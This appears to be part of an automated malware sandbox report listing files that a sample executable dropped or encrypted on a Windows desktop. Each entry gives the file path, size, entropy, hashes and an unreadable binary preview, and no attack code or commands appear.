Preview:	WKXEW.;N..q<.)5.....Y..k.._g......o.d:X......+~0.N..F."...1.7u......[..vh...W/..H:'y....r.-:Wp.W."_%9.$..',..............&.....~.U.&...<..i1..`..qrp.S.d..j.LY.\|9..W.m=.+f...8.8.....T...."zG.....P.K9..0...o..............g.).c~......!.....s..X..b....(,Ab.JpA.......p..........k....j..}...=.....6.....G..^...O..%...I.60h.5.B....-..:...S.....Q.......(.~.......B.n.R..\='...Qff.....~......W.+E..&$.....Y..D.Nl.Y.Z.Z...V.{.Y.\.Z.G..........L.=.C6J..s..r8..x..~...h..x...{z.u..N.N.i.0:d[%........T......&.GW.R3o...&...j.u........ ....h.}.v.i.mP...@...6E].dg........d..H.......].... ...8:E............>....vvS5./*..._.S....%%.N.DK8.aW.hc.....bo. .i..;..0a.{,...X....m.._.0h....~.`.ip...q....r..N..x.1j....5i#...Q..eZ.a.rx.d7vn....D... q!..!...m".#u$8W......j~.&.o...v......L.&4..Q.K8.d.....X...<d.,}.Q..6.....z.../3...X.[.."...\|.......{....;.N..3Q.b.u.../B..#g.p/.......EQL.cFO.W.f..}...a[~.....%@.%.B.pB.......]Q...h..;q..r.\..O.@.Wj..@.O.@"Xv...=..O.#.G......-

C:\Users\user\Desktop\FENIVHOIKN\WKXEWIOTXI.xlsx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865108953781185
Encrypted:	false
SSDEEP:	24:ixZiP8MITcWWMTm6VvS9tst4HEBg96V+0ILQl+5Jt1dgCkJWFbD:g86dSDsqkBW6V+NJnAJWVD
MD5:	268812BE40C56EF6CAC2B65AB5BEA472
SHA1:	ED7D4E52FFD60928C826B7313D4017543EE0A705
SHA-256:	85438958A011519639BEB9BA8C28A8692BB073223D361DAF4055F6D884A50EBC
SHA-512:	160861D9B9E128F8294F1A6A89ABBC95CA348BBE8D5463966D4BC891FC536A097BD9D411DA1FC80CEBAE267277A4DEA049469F78757E0A5C84B84B06A656938C
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.;N..q<.)5.....Y..k.._g......o.d:X......+~0.N..F."...1.7u......[..vh...W/..H:'y....r.-:Wp.W."_%9.$..',..............&.....~.U.&...<..i1..`..qrp.S.d..j.LY.\|9..W.m=.+f...8.8.....T...."zG.....P.K9..0...o..............g.).c~......!.....s..X..b....(,Ab.JpA.......p..........k....j..}...=.....6.....G..^...O..%...I.60h.5.B....-..:...S.....Q.......(.~.......B.n.R..\='...Qff.....~......W.+E..&$.....Y..D.Nl.Y.Z.Z...V.{.Y.\.Z.G..........L.=.C6J..s..r8..x..~...h..x...{z.u..N.N.i.0:d[%........T......&.GW.R3o...&...j.u........ ....h.}.v.i.mP...@...6E].dg........d..H.......].... ...8:E............>....vvS5./*..._.S....%%.N.DK8.aW.hc.....bo. .i..;..0a.{,...X....m.._.0h....~.`.ip...q....r..N..x.1j....5i#...Q..eZ.a.rx.d7vn....D... q!..!...m".#u$8W......j~.&.o...v......L.&4..Q.K8.d.....X...<d.,}.Q..6.....z.../3...X.[.."...\|.......{....;.N..3Q.b.u.../B..#g.p/.......EQL.cFO.W.f..}...a[~.....%@.%.B.pB.......]Q...h..;q..r.\..O.@.Wj..@.O.@"Xv...=..O.#.G......-

C:\Users\user\Desktop\NEBFQQYWPS.mp3

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8360020266628725
Encrypted:	false
SSDEEP:	24:j2gyo4tYTNnZdB0H54Lcf/oC+xII/cj75XhxuMpMZR9VoEBV0WFbD:j232p6H9h+pczoMpMZR9lAWVD
MD5:	F87AC0E3920F27697B51010DAC385387
SHA1:	2FAAD2020D58F0C1378E9C0E07C5AB98B39C8492
SHA-256:	41CAD36BC7615D7CFA00C5AE78823F1203CBFF317B21CA9B5DB4A50BB95E58D2
SHA-512:	E8A2CFF87B3DF1FBCDB797E20BCEB960638D39EAB6A37D447FC33B4182443E79615AAF29515ECF902DACD6879AA7C588A5489ED3905E5560267EF59C6652F667
Malicious:	false
Reputation:	unknown
Preview:	NEBFQ..n.E.vB.u....}a..&PQ1.......].EN#.N.h..8.....h.....E8e.(.7...9#.9L.........]..T..F..z..\|.....uM..O.\...B...1Y......7......X.N..+.......i.......?.S.R(w....t..ue........<......`...{.9..}3.....R..5,\|B..d.H...E..S.k....-...3+X..$........ns?...........I.}..y...(.....).%.".b}...1.f......"..>..X?$.X.f.d.. .$....nI..x.%......9!.........l.\0%..........Fa7]...3i;.......f..-.(yzvU....$_.....N.....(~....2.......b...ov?...9H...9t..O..-.X.5"..C....7M.N....aw%.P..2......C...x..sr.T..a.Y..{8.^.F.,)....-n1..wG..t.&.&..P......w. .Q....*!.\.....&A...$.....?`6l.e.t..............;"k.T..FZ:N@F.-s....L.....8h.9...$.3.O}.S..R...M.x..V.].`i.`4.G.s.r~j/.kl&5#.+..I....Gv.K=u....P%%...O.GN.........I'z.b..,....\|.T'.2.g..........S.)...Z..,..9.Qi.\.......sCbh6}F\|:L1p....[."Q.....3.....h.hm.D-;&.i3t.......G=.2...^{C....]...fl..............k2p.....PH...t....(..6:K.U..h....t..s.r.U.....f...'w.....l...z5S.o...).5.j1....U.H...y@>.A.?..[....(.C.A..F....B.YA.

C:\Users\user\Desktop\NEBFQQYWPS.mp3.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8360020266628725
Encrypted:	false
SSDEEP:	24:j2gyo4tYTNnZdB0H54Lcf/oC+xII/cj75XhxuMpMZR9VoEBV0WFbD:j232p6H9h+pczoMpMZR9lAWVD
MD5:	F87AC0E3920F27697B51010DAC385387
SHA1:	2FAAD2020D58F0C1378E9C0E07C5AB98B39C8492
SHA-256:	41CAD36BC7615D7CFA00C5AE78823F1203CBFF317B21CA9B5DB4A50BB95E58D2
SHA-512:	E8A2CFF87B3DF1FBCDB797E20BCEB960638D39EAB6A37D447FC33B4182443E79615AAF29515ECF902DACD6879AA7C588A5489ED3905E5560267EF59C6652F667
Malicious:	false
Reputation:	unknown
Preview:	NEBFQ..n.E.vB.u....}a..&PQ1.......].EN#.N.h..8.....h.....E8e.(.7...9#.9L.........]..T..F..z..\|.....uM..O.\...B...1Y......7......X.N..+.......i.......?.S.R(w....t..ue........<......`...{.9..}3.....R..5,\|B..d.H...E..S.k....-...3+X..$........ns?...........I.}..y...(.....).%.".b}...1.f......"..>..X?$.X.f.d.. .$....nI..x.%......9!.........l.\0%..........Fa7]...3i;.......f..-.(yzvU....$_.....N.....(~....2.......b...ov?...9H...9t..O..-.X.5"..C....7M.N....aw%.P..2......C...x..sr.T..a.Y..{8.^.F.,)....-n1..wG..t.&.&..P......w. .Q....*!.\.....&A...$.....?`6l.e.t..............;"k.T..FZ:N@F.-s....L.....8h.9...$.3.O}.S..R...M.x..V.].`i.`4.G.s.r~j/.kl&5#.+..I....Gv.K=u....P%%...O.GN.........I'z.b..,....\|.T'.2.g..........S.)...Z..,..9.Qi.\.......sCbh6}F\|:L1p....[."Q.....3.....h.hm.D-;&.i3t.......G=.2...^{C....]...fl..............k2p.....PH...t....(..6:K.U..h....t..s.r.U.....f...'w.....l...z5S.o...).5.j1....U.H...y@>.A.?..[....(.C.A..F....B.YA.

C:\Users\user\Desktop\RAYHIWGKDI.xlsx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860748431265312
Encrypted:	false
SSDEEP:	24:acFIfmVpuyGdH/yZUPxfPpd7eCUw5kuprHuOFHxolvG22T+kMrfI2WFbD:j6fmChdfH3p5eM53LbsdWVD
MD5:	0A7DBEA89DDB68A9573820E27ACD9A92
SHA1:	A0484C93C443C80B964F30A130A80179AB0F31A9
SHA-256:	A5B53A19A3B6BEA3867954F85E4597039BE72E526291242633B93C5BE7432B31
SHA-512:	5EDEEE93CAC1E9A227223AD8EA8A8670E6B1F9FCA98BD0EDA147A60592924BDAF3A4A915F22AF20A11BE1FB6DE6B3568C2826C5E0847D216F72767DDDD8B8F73
Malicious:	false
Reputation:	unknown
Preview:	RAYHI...\.(.Pc...H. J.+^$#v}N.\r`EzY.r]...~f..n.'D;......3.kJ........G..R..G..hK....v...t..$......_d.....wH.X..Kb"^...+.Jv.\|.....;..?x?K....#..e...).#F..s\..........M..c.Y...2u?W..T......)...Ivm&...u...."....m.r..)..;..C.."....QL..A.] .j....0...R.!ah.94....).......]...q..ee9/c...^4......[:.uO..$.....h._.1:vX\T.W.....5b..o.^:.J.X@.<..R..d.n..`6...m2.Jf].g9?.P....`[.[k.rj....}.K..y)(.M....T...i.K.7{%k..Ej?.J..NGd_Dw...eF.[.z.....I.3..%U..>....).....1..?..Snl...+1Jzo.^........G.Y.[...@.....d;.S....".e.;$..c/...5....B.~. .B,.5.}C.....I..;.%PU)It.........H'8....*.....y....g.t.+..S...,.c...w{.W=...`..!...].......$ .7.).....}../....v..,....L,9F..S..G.d.T......{/F@.J...-.........^r.....A.....4_.u-.+{.`Di.?b..{Ax. ..LI.......?qKIx...TjS.FZ.r..!W...].KE?..g._.,......^.J...b.b<.{....o{.....Y.......42..C\.'.....z..S....6[YD.]....-S}w..]{...l.w6.6...eA...+..]/.........d}.....S+)Q.1.....b.T....z.L....x..l...........S...h...\.[..@........

C:\Users\user\Desktop\RAYHIWGKDI.xlsx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860748431265312
Encrypted:	false
SSDEEP:	24:acFIfmVpuyGdH/yZUPxfPpd7eCUw5kuprHuOFHxolvG22T+kMrfI2WFbD:j6fmChdfH3p5eM53LbsdWVD
MD5:	0A7DBEA89DDB68A9573820E27ACD9A92
SHA1:	A0484C93C443C80B964F30A130A80179AB0F31A9
SHA-256:	A5B53A19A3B6BEA3867954F85E4597039BE72E526291242633B93C5BE7432B31
SHA-512:	5EDEEE93CAC1E9A227223AD8EA8A8670E6B1F9FCA98BD0EDA147A60592924BDAF3A4A915F22AF20A11BE1FB6DE6B3568C2826C5E0847D216F72767DDDD8B8F73
Malicious:	false
Reputation:	unknown
Preview:	RAYHI...\.(.Pc...H. J.+^$#v}N.\r`EzY.r]...~f..n.'D;......3.kJ........G..R..G..hK....v...t..$......_d.....wH.X..Kb"^...+.Jv.\|.....;..?x?K....#..e...).#F..s\..........M..c.Y...2u?W..T......)...Ivm&...u...."....m.r..)..;..C.."....QL..A.] .j....0...R.!ah.94....).......]...q..ee9/c...^4......[:.uO..$.....h._.1:vX\T.W.....5b..o.^:.J.X@.<..R..d.n..`6...m2.Jf].g9?.P....`[.[k.rj....}.K..y)(.M....T...i.K.7{%k..Ej?.J..NGd_Dw...eF.[.z.....I.3..%U..>....).....1..?..Snl...+1Jzo.^........G.Y.[...@.....d;.S....".e.;$..c/...5....B.~. .B,.5.}C.....I..;.%PU)It.........H'8....*.....y....g.t.+..S...,.c...w{.W=...`..!...].......$ .7.).....}../....v..,....L,9F..S..G.d.T......{/F@.J...-.........^r.....A.....4_.u-.+{.`Di.?b..{Ax. ..LI.......?qKIx...TjS.FZ.r..!W...].KE?..g._.,......^.J...b.b<.{....o{.....Y.......42..C\.'.....z..S....6[YD.]....-S}w..]{...l.w6.6...eA...+..]/.........d}.....S+)Q.1.....b.T....z.L....x..l...........S...h...\.[..@........

C:\Users\user\Desktop\SFPUSAFIOL.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.820375540612109
Encrypted:	false
SSDEEP:	24:OZ/Fh1fG3u9PKxNVL5KbF/qtP2TyF4f+qMcanK/UP1YVTAicVFlYHZtbn363kyko:O/zGBxD5Kbx2/bqHanJyTDcVFlYHZF5o
MD5:	955196C610B7BD148B20AD3F7B8B452F
SHA1:	D72C8CBCDD018A8EE6E4E111A41CB641934D8A55
SHA-256:	F16A047D0CD08878CEFB1604F37747E9CAFF50D51600197C21387085387EF85D
SHA-512:	9516755A17D552BACF69AC71FD760792EB20B221E9FB35F77ADE7975EE5BB6853B0C9C4275B1B1D22C02D3FA9CAF1EB8F342E38DB52ED0227047EE7294D20493
Malicious:	false
Reputation:	unknown
Preview:	SFPUS"...)...5.e{\....;x.#B..O.d1\...\|.sc.A..(..~....X.#-.....<..... ^L.EW..../w....b..^..l...S!..a.KP.(1/...Y..\|....S...L......p..R.Iu..Z..(o..}a..)r>..:V...?...=u.y.+,....[..:.z.....2.uT..:.2..IJ.....K&F.D..H@.@..uI.....Qfe.@6.._....9.Y.k>$=.i5"A..>.y.?0.7..V.l........I\|>&.h.B~...E.....1.i4.....=.....r....aFA}.^......<....{b./.&2.3.<3....3.&.k.8........C8..Q....\|K..........Z.\...u...?....>...~....~..%3...@....G..H....F.......'.....6..k..t.9..rOk..H....d...1.{.@...>.....xS........>.z...`..4r$. ...e.....\../?.....B......8,..4l}..J.....R.0....7.P9.....F...%SrgT.....~5.r.'..[....9..Ki.];...3...O^..szR.#.j.R.xCi..Wj..cIz:.".iq`..KR.'.%....H(2..$...l.f...0.2:.o.D..t..].....B...2...yQ,....<.1`8.4.4.nc.kZ...-...L....aE.Of.M$....'.37..H$.......`..&tgi..A....B].....o..M g1..F.....2..L.V..w yU=..u.1.g..C-rk..[...n.......s.....d@....s....R.^I%j.r.0..C..bw*r~....OJ..>v.........k!...[&E0...V....Q....L........G.0.$...].. I...g8.#.P..WG.B@

C:\Users\user\Desktop\SFPUSAFIOL.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.820375540612109
Encrypted:	false
SSDEEP:	24:OZ/Fh1fG3u9PKxNVL5KbF/qtP2TyF4f+qMcanK/UP1YVTAicVFlYHZtbn363kyko:O/zGBxD5Kbx2/bqHanJyTDcVFlYHZF5o
MD5:	955196C610B7BD148B20AD3F7B8B452F
SHA1:	D72C8CBCDD018A8EE6E4E111A41CB641934D8A55
SHA-256:	F16A047D0CD08878CEFB1604F37747E9CAFF50D51600197C21387085387EF85D
SHA-512:	9516755A17D552BACF69AC71FD760792EB20B221E9FB35F77ADE7975EE5BB6853B0C9C4275B1B1D22C02D3FA9CAF1EB8F342E38DB52ED0227047EE7294D20493
Malicious:	false
Reputation:	unknown
Preview:	SFPUS"...)...5.e{\....;x.#B..O.d1\...\|.sc.A..(..~....X.#-.....<..... ^L.EW..../w....b..^..l...S!..a.KP.(1/...Y..\|....S...L......p..R.Iu..Z..(o..}a..)r>..:V...?...=u.y.+,....[..:.z.....2.uT..:.2..IJ.....K&F.D..H@.@..uI.....Qfe.@6.._....9.Y.k>$=.i5"A..>.y.?0.7..V.l........I\|>&.h.B~...E.....1.i4.....=.....r....aFA}.^......<....{b./.&2.3.<3....3.&.k.8........C8..Q....\|K..........Z.\...u...?....>...~....~..%3...@....G..H....F.......'.....6..k..t.9..rOk..H....d...1.{.@...>.....xS........>.z...`..4r$. ...e.....\../?.....B......8,..4l}..J.....R.0....7.P9.....F...%SrgT.....~5.r.'..[....9..Ki.];...3...O^..szR.#.j.R.xCi..Wj..cIz:.".iq`..KR.'.%....H(2..$...l.f...0.2:.o.D..t..].....B...2...yQ,....<.1`8.4.4.nc.kZ...-...L....aE.Of.M$....'.37..H$.......`..&tgi..A....B].....o..M g1..F.....2..L.V..w yU=..u.1.g..C-rk..[...n.......s.....d@....s....R.^I%j.r.0..C..bw*r~....OJ..>v.........k!...[&E0...V....Q....L........G.0.$...].. I...g8.#.P..WG.B@

C:\Users\user\Desktop\UOOJJOZIRH.jpg

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.86228458164023
Encrypted:	false
SSDEEP:	24:7of2+8TeRF7MwOnMONrDUBoByxsl3wNsZKmjdMpqmAo4SI+H1wA/Ryh22o0R7CcU:RzOFcMOyBooGwKlxMpq7vSI+H1wAnFcU
MD5:	33ED37349C8BF8E72B9B567AEA2D4349
SHA1:	F2A6A7B7A9A650217344DAF6DAB133E914BBD7B9
SHA-256:	B9F1C23339FB981AAE0304E1CDA6DF96FD23C837A4422AF1E124CA1F1CB35AA0
SHA-512:	A9D7806BB8EC0A350B2BBB06BB3E3EB7C475C1285D4EAFB1850948AC5446FABAE59AF7E8277C053C7E3F92FFDE9084F33E6D7ED4785E6C97733BD39C5256A610
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ...t.m.....r...C...kE...G...'..k.5a.U..JO.\|^.D[..fo.Xv.s$J...r~...C=.\|.rHks.......W5I...1.............".F.vs..g.`..5..EK...yLe.A.....g...H.?x.[..;......Xa..0.....u.V..(g.c.:2....=.tH1...t...Ng....,fX}%....Z'......:5a.{Y.Y.^.k.D\A...$.;.F.V....@P.@.+.S@.c....y<..._..fp..v....7\|..m%9..]...~9.K.d.'...vf.....ac...Mn.O..B..J.....,.......'...s..<.)0....(.WO.].R...N.I...D.....9..9_....+.`Dj.3i.F.\0.L.....-.>..?...xP..M0.6C.f...yQ.1.].2..0,_@$p.>..S..i."%S...S.Ekz[.A2{.....b....y.....q.{....;.Oc.V.q..Rb.+..\|.....]...Y[....o.\\P.......]...,U.)LQzH...v..B#K.CY....$.1m.\|UrB..u.....D.......V....)qu..29e.`E....j6.Yj...x8^....O}}...P..3...o.Ch.....\|5....!;.j.,!.=.S..6U.......T.....pI.v..-3...V.a..IOs....".(!.j.L!5...R...Z4.EB.....q.q....Q...Xn..\f.x...pF.F...&-...,A....I.mZ....y."..ce0...K..\|F..!.P5x...M.......N..............-&.<.CRj\..;qH..;...?AU.e........xe.E..5zu..\|bS..#.3P.n.lbl.%...'....Nn.rE.......>i.......IG=...._.i.].+}....b.

C:\Users\user\Desktop\UOOJJOZIRH.jpg.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.86228458164023
Encrypted:	false
SSDEEP:	24:7of2+8TeRF7MwOnMONrDUBoByxsl3wNsZKmjdMpqmAo4SI+H1wA/Ryh22o0R7CcU:RzOFcMOyBooGwKlxMpq7vSI+H1wAnFcU
MD5:	33ED37349C8BF8E72B9B567AEA2D4349
SHA1:	F2A6A7B7A9A650217344DAF6DAB133E914BBD7B9
SHA-256:	B9F1C23339FB981AAE0304E1CDA6DF96FD23C837A4422AF1E124CA1F1CB35AA0
SHA-512:	A9D7806BB8EC0A350B2BBB06BB3E3EB7C475C1285D4EAFB1850948AC5446FABAE59AF7E8277C053C7E3F92FFDE9084F33E6D7ED4785E6C97733BD39C5256A610
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ...t.m.....r...C...kE...G...'..k.5a.U..JO.\|^.D[..fo.Xv.s$J...r~...C=.\|.rHks.......W5I...1.............".F.vs..g.`..5..EK...yLe.A.....g...H.?x.[..;......Xa..0.....u.V..(g.c.:2....=.tH1...t...Ng....,fX}%....Z'......:5a.{Y.Y.^.k.D\A...$.;.F.V....@P.@.+.S@.c....y<..._..fp..v....7\|..m%9..]...~9.K.d.'...vf.....ac...Mn.O..B..J.....,.......'...s..<.)0....(.WO.].R...N.I...D.....9..9_....+.`Dj.3i.F.\0.L.....-.>..?...xP..M0.6C.f...yQ.1.].2..0,_@$p.>..S..i."%S...S.Ekz[.A2{.....b....y.....q.{....;.Oc.V.q..Rb.+..\|.....]...Y[....o.\\P.......]...,U.)LQzH...v..B#K.CY....$.1m.\|UrB..u.....D.......V....)qu..29e.`E....j6.Yj...x8^....O}}...P..3...o.Ch.....\|5....!;.j.,!.=.S..6U.......T.....pI.v..-3...V.a..IOs....".(!.j.L!5...R...Z4.EB.....q.q....Q...Xn..\f.x...pF.F...&-...,A....I.mZ....y."..ce0...K..\|F..!.P5x...M.......N..............-&.<.CRj\..;qH..;...?AU.e........xe.E..5zu..\|bS..#.3P.n.lbl.%...'....Nn.rE.......>i.......IG=...._.i.].+}....b.

C:\Users\user\Desktop\VAMYDFPUND.pdf

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855637400549687
Encrypted:	false
SSDEEP:	24:wdw6bsQx5VHb0ZaMjPvDRMzgxPKcbUYAMpR6WNcnACHoTwEUWFbD:wRjF4ag99fYM2PzpWVD
MD5:	B61444789A226BF61DCB57EADF0295A8
SHA1:	2DC4017792D6A227032EFB947D9014737E2B8EAB
SHA-256:	659F2B6D58672F69AFCFF3B8567155113BD551F4ED76578707CF2D09EFE3E4FC
SHA-512:	22667E9856399DDE08C4A7C6E7503A6385B0FFA2DD2A107E69FD1A05AE48E4381F3FB45A4237B62BB07A8C122BBFCC5FAD1DCD4383AAA91BDB02F3D1721A10FB
Malicious:	false
Reputation:	unknown
Preview:	VAMYD.H.\!........X.,...i{>....&.K73.h.....f.k...e...js..._...S.\uW...AX......,f>..{....vy.g............B....#....X......aQ-.\|...D../.G.......o2b.....p....>..=!<Ek.. 4./..]...d....M....a^1......!r.;~....4Ws....a(.g.......^...KK.Xe..;..f..Z..d...y....]....kp........@....5R.C7CF... V.A..}mx.r.....lQ.#..WbH..........k.s...W......^M.Y0.S#h..F...e............2&t...c&....!/Cu,y@{.]Mn..q..d.q.$..?....)>..DI..-....&.47.YZc~..}..U._3.ek.Q.wJ..s..H....r..i.....-..F{...s........Ts..t.c{.?)h....`.~s.h..u..)n...9...j.5......?.Hc....s...n..}...*.4......fm#.>%.......?.cg...?;I.8...(<..k...h<Z..Yu.#p.....A..}.W.y..s..+.>..G.R....4L)..Z.4..j...f.....`~.L.Tr.f,k..n).::..x.&]....C\.<e....Vx..e.^.E7..(t.....x....&F'...U(..@..S..pdf.6........a.....3..#..f.#.IO..&r.N.w_.p....?.....W...B..........."..:.z.@.5..Xt.Cn\|...5....x.....?N.X.8.%tW.C....L..V.7.wm....u.K....'S.U!........Q.p..7.Vz.l..7.........8.Z.........x...=.&Y.L...#....MCH>....

C:\Users\user\Desktop\VAMYDFPUND.pdf.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855637400549687
Encrypted:	false
SSDEEP:	24:wdw6bsQx5VHb0ZaMjPvDRMzgxPKcbUYAMpR6WNcnACHoTwEUWFbD:wRjF4ag99fYM2PzpWVD
MD5:	B61444789A226BF61DCB57EADF0295A8
SHA1:	2DC4017792D6A227032EFB947D9014737E2B8EAB
SHA-256:	659F2B6D58672F69AFCFF3B8567155113BD551F4ED76578707CF2D09EFE3E4FC
SHA-512:	22667E9856399DDE08C4A7C6E7503A6385B0FFA2DD2A107E69FD1A05AE48E4381F3FB45A4237B62BB07A8C122BBFCC5FAD1DCD4383AAA91BDB02F3D1721A10FB
Malicious:	false
Reputation:	unknown
Preview:	VAMYD.H.\!........X.,...i{>....&.K73.h.....f.k...e...js..._...S.\uW...AX......,f>..{....vy.g............B....#....X......aQ-.\|...D../.G.......o2b.....p....>..=!<Ek.. 4./..]...d....M....a^1......!r.;~....4Ws....a(.g.......^...KK.Xe..;..f..Z..d...y....]....kp........@....5R.C7CF... V.A..}mx.r.....lQ.#..WbH..........k.s...W......^M.Y0.S#h..F...e............2&t...c&....!/Cu,y@{.]Mn..q..d.q.$..?....)>..DI..-....&.47.YZc~..}..U._3.ek.Q.wJ..s..H....r..i.....-..F{...s........Ts..t.c{.?)h....`.~s.h..u..)n...9...j.5......?.Hc....s...n..}...*.4......fm#.>%.......?.cg...?;I.8...(<..k...h<Z..Yu.#p.....A..}.W.y..s..+.>..G.R....4L)..Z.4..j...f.....`~.L.Tr.f,k..n).::..x.&]....C\.<e....Vx..e.^.E7..(t.....x....&F'...U(..@..S..pdf.6........a.....3..#..f.#.IO..&r.N.w_.p....?.....W...B..........."..:.z.@.5..Xt.Cn\|...5....x.....?N.X.8.%tW.C....L..V.7.wm....u.K....'S.U!........Q.p..7.Vz.l..7.........8.Z.........x...=.&Y.L...#....MCH>....

C:\Users\user\Desktop\WKXEWIOTXI.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861416479683186
Encrypted:	false
SSDEEP:	24:hJsbhq2WWNwhFd/a2BqVqtx/gY+dv7S/ck21sBPFtDumkITcxmKwYIIqTwIpzWFX:iZiTd/0Wx/gYEO/cs5FtSmkI2gtIqVWt
MD5:	FBACE24F49B9350AB8CF062491F4BF32
SHA1:	0BEA6896BEA3B117926587543BE8B8D9FEE90244
SHA-256:	42CB5273EC6714DA082674100BBA0F5384C51A4B71FCC1A3F6FF541A17DB3CE9
SHA-512:	CF2B086568D122D1D245585EF0D81E03A3430FCB9E87D9539862DAE9D67BA607783E230FE99634CA202E1ED395D19501DE731EB07EDADB7E2D37026E0B80FE8A
Malicious:	false
Reputation:	unknown
Preview:	WKXEWf....3.B..}....f.._1.M..K.k...8.....\|)i...s.L...^.._9...6Jq..S=.(..{0.).e..~R..&.{.S..9..\|....3.......X~CK.Y...4..\..1.B.x..`.+...V...s)..M..]../....&?NN!.t$.W`.......y...X)5}.q...V`..ah.h.+(a....:j....+.S...z......"..bt.\~P...CIf..".=.K.....r...A.h...=Ks.6G<.1...Y./..H.1.. n~...iL..'........Y_.-...T.1......&...(...d.^...O...R..!..,A..<..z.9.. q.....F..$.up...t.#.u.."....^.#..)[.y....U[g.N..........(....x....{.....b......p.w.~_...^..6.....b.3..0;.{.IZ.WAb...+........gjy....T._.U.._I.N..I.N..G....A.Bb..z`!....T./q.Rv..:.r..........4....O...e.tQ-......../.....yJ]{.....s.:.."..=.`.....jU.m.[..-.$%...Y..h\...H.'.q.wbm%.......q..Q.>..........'ENPkw.abLN...C.kc.k....o1....Y`.;....PN.Dm8..X...=)..y.\|.a"....`.....V..U.J..F.....G.@w....M{...\6.....}b....v_?.........B....A.^O9v..uD...B.-q...wR.-.....J...p....=.xR1..P...y...(.y.7./q..<3.......Fi...?X#..(.V.m..T.6Xz%B..wU....x2j%.p...w.;.a.?tN..9..G*..........0..bO..0.A\|.t...Mn..

C:\Users\user\Desktop\WKXEWIOTXI.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861416479683186
Encrypted:	false
SSDEEP:	24:hJsbhq2WWNwhFd/a2BqVqtx/gY+dv7S/ck21sBPFtDumkITcxmKwYIIqTwIpzWFX:iZiTd/0Wx/gYEO/cs5FtSmkI2gtIqVWt
MD5:	FBACE24F49B9350AB8CF062491F4BF32
SHA1:	0BEA6896BEA3B117926587543BE8B8D9FEE90244
SHA-256:	42CB5273EC6714DA082674100BBA0F5384C51A4B71FCC1A3F6FF541A17DB3CE9
SHA-512:	CF2B086568D122D1D245585EF0D81E03A3430FCB9E87D9539862DAE9D67BA607783E230FE99634CA202E1ED395D19501DE731EB07EDADB7E2D37026E0B80FE8A
Malicious:	false
Reputation:	unknown
Preview:	WKXEWf....3.B..}....f.._1.M..K.k...8.....\|)i...s.L...^.._9...6Jq..S=.(..{0.).e..~R..&.{.S..9..\|....3.......X~CK.Y...4..\..1.B.x..`.+...V...s)..M..]../....&?NN!.t$.W`.......y...X)5}.q...V`..ah.h.+(a....:j....+.S...z......"..bt.\~P...CIf..".=.K.....r...A.h...=Ks.6G<.1...Y./..H.1.. n~...iL..'........Y_.-...T.1......&...(...d.^...O...R..!..,A..<..z.9.. q.....F..$.up...t.#.u.."....^.#..)[.y....U[g.N..........(....x....{.....b......p.w.~_...^..6.....b.3..0;.{.IZ.WAb...+........gjy....T._.U.._I.N..I.N..G....A.Bb..z`!....T./q.Rv..:.r..........4....O...e.tQ-......../.....yJ]{.....s.:.."..=.`.....jU.m.[..-.$%...Y..h\...H.'.q.wbm%.......q..Q.>..........'ENPkw.abLN...C.kc.k....o1....Y`.;....PN.Dm8..X...=)..y.\|.a"....`.....V..U.J..F.....G.@w....M{...\6.....}b....v_?.........B....A.^O9v..uD...B.-q...wR.-.....J...p....=.xR1..P...y...(.y.7./q..<3.......Fi...?X#..(.V.m..T.6Xz%B..wU....x2j%.p...w.;.a.?tN..9..G*..........0..bO..0.A\|.t...Mn..

C:\Users\user\Desktop\WKXEWIOTXI.xlsx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855311758644098
Encrypted:	false
SSDEEP:	24:VLHejBlos3FS2Tn8ANJGIBP4u27qk8xYq+V+u6SiK+xG/XbAYWFbD:JHuloCFSunJ822+fYqM+jSiK+ssYWVD
MD5:	7DA402A7CDD50D51C65CC2C3A350C504
SHA1:	F58D06D4A05FF9A025D8C8E554B58DFD54200906
SHA-256:	C2B644BBBF5F6806667C3821F1C03620F95FCD0B74CF96CDB7D3EF68475B77B3
SHA-512:	EE45343DE71F7F7F6E8BF90B35B0C78D1580896A0381F666AF99658C25D300B7DD49DD8E6711BA2D8C4001612A65A825D9B035A563D0B063166C0AD43D97D5D9
Malicious:	false
Reputation:	unknown
